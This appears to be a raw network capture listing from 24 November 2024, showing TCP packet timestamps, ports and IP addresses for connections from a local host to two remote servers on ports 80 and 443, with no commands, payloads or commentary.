                                                                                                                                                                                                Nov 24, 2024 03:04:31.740358114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.740403891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.740473986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.741550922 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.741622925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.741635084 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.742743015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.742794991 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.742845058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.743952036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.744024992 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.744039059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.745138884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.745193958 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.745301962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.746351957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.746395111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.746419907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.747545958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.747620106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.747663021 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.748716116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.748836994 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.748884916 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.749902010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.749989986 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.750016928 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.751131058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.751182079 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.751209974 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.752321005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.752367973 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.752410889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.753535032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.753621101 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.753633022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.754731894 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.754795074 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.754820108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.755923986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.755979061 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.756011963 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.757107019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.757157087 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.757205009 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.758330107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.758395910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.758441925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.759510040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.759638071 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.759680033 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.760703087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.760757923 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.760807991 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.761888981 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.761941910 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.761996031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.763103008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.763154030 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.763212919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.764307976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.764354944 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.764406919 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.765469074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.765522003 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.765599012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.766675949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.766726971 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.766768932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.767868996 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.767927885 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.767951012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.769068003 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.769117117 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.769164085 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.770277977 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.770364046 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.770386934 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.771466970 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.771517038 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.771564007 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.772659063 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.772706985 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.772752047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.772917986 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.773880959 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.774030924 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.774076939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.775037050 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.775171041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.775223017 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.776232958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.776341915 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.776381969 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.777421951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.777514935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.777560949 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.787662983 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.788731098 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:31.788743973 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.790985107 CET49730443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:31.790992975 CET4434973013.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.813349962 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.816540956 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.816631079 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:31.816647053 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.816698074 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:31.818645954 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.818674088 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.818723917 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:31.818733931 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.824213982 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:31.824230909 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.883696079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.883836985 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.883955002 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.884326935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.884465933 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.884515047 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.885530949 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.885644913 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.885735989 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.886682987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.920753956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.920772076 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.920857906 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.921284914 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.921335936 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.921359062 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.922493935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.922600031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.922648907 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.923707962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.923832893 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.923892021 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.924870968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.924928904 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.924963951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.926095009 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.926143885 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.926172018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.927263975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.927341938 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.927369118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.928456068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.928560019 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.928610086 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.929661036 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.929721117 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.929755926 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.930941105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.930965900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.930989981 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.932090998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.932133913 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.932156086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.933259010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.933378935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.933401108 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.934453964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.934559107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.934600115 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.935633898 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.935712099 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.935744047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.936831951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.936886072 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.936937094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.938112020 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.938201904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.938256025 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.939208031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.939330101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.939374924 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.940468073 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.940571070 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.940619946 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.941626072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.941693068 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.941740990 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.942816973 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.942864895 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.942924976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.944006920 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.944060087 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.944128990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.945214987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.945270061 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.945298910 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.946417093 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.946458101 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.946507931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.947634935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.947679043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.947709084 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.948800087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.948873043 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.948900938 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.949985027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.950057983 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.950088024 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.951200962 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.951262951 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.951280117 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.952409983 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.952482939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.952512980 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.953594923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.953689098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.953711987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.954380989 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.954785109 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.954843044 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.954869986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.956000090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.956083059 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.956131935 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.957174063 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.957245111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.957268953 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.958379984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.958466053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.958518028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.959551096 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.959597111 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.959667921 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.960767984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.960809946 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.960835934 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.961949110 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.962029934 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.962044001 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.963145018 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.963260889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.963318110 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.964339972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.964384079 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.964441061 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.965532064 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.965581894 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.965629101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.966737032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.966798067 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.966824055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.968008041 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.968070030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.968079090 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.969140053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.969238043 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.969296932 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.970347881 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.970428944 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.970443010 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.971517086 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.971564054 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.971610069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.972882986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.972897053 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.972922087 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.973939896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.974029064 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.974143028 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.975135088 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.975205898 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.975282907 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.976325989 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.976423025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.976459980 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.977497101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.977545023 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.977597952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.978703976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.978785038 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:31.978857040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:31.984474897 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.086086035 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.086101055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.086111069 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.086122990 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.086153984 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.086186886 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.086898088 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.087038040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.087138891 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                                Nov 24, 2024 03:04:32.087744951 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.088140965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                                Nov 24, 2024 03:04:32.088371992 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                                Nov 24, 2024 03:04:32.088387012 CET4434973113.107.246.63192.168.2.5
